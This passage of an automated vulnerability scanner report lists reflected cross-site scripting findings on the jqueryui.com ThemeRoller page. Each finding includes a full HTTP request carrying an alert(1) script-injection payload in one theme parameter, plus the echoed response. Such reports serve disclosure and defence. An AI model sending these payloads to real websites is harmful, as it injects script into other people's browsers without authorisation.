cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

3.64. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4f1"><script>alert(1)</script>409c40fb7a8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.65. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e9c"><script>alert(1)</script>97a66de1e5d was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.66. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effe2"><script>alert(1)</script>ea171b4358b was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37be1"><script>alert(1)</script>2443dcf35 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120061

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf69"><script>alert(1)</script>f530c1d1079 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b812"><script>alert(1)</script>7ded0019f81 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465c6"><script>alert(1)</script>ee3c1ef3667 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.71. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b74b"><script>alert(1)</script>e7031a0cc1 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.72. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb22a"><script>alert(1)</script>8dcb00c57c8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

3.73. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7294b"><script>alert(1)</script>0b2f30c780e was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

